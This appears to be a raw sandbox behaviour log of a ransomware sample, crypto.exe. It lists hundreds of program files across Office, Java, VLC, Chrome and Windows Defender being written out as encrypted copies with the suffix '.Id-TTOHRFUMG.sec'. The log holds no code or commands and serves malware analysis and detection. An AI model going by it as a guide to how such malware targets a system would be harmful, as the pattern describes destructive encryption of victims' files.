File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183168.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ccme_base.dll	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jfr\default.jfc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Ojinaga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21326_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\RTFHTML.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLPERF.H.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_de.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libty_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sk.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PNCTUATE.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\RSSFeeds.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\11.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304371.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_shout_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_fr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\softedges.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NAMECONTROLSERVER.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoDev.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Newsprint.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\LightSpirit.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_alignright.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02282_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05930_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\MpOAV.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7db.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Madrid.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jaas_nt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLLEX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\dt_socket.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONWordAddin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\kk.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15170_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libzvbi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Resolute.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299611.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OSPP.VBS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105276.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02296_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\lv.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SLINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\IPMS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\203x8subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANE.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\calendars.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216612.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199755.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files\Java\jre7\bin\server\classes.jsa	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CollectSignatures_Sign.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RECS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\macroprogress.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7MODELS0009.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\OOFS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\REPTWIZ.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ExpandFormat.vb.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105320.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBARBLL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libfingerprinter_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jp2iexp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\policytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\CAGCAT10.MMW.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxinfo.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_it.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01191_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06450_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNoteNames.gpd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Dialog.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Beirut.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCHUR98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_dummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301480.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOHEVI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\fxplugins.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIBUtils.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\To_Do_List.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msolap100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Civic.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14530_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libvmem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Austin.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fa.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREETING.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\MLA.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmlaunch.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15023_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OUTGOING.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\mpvis.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
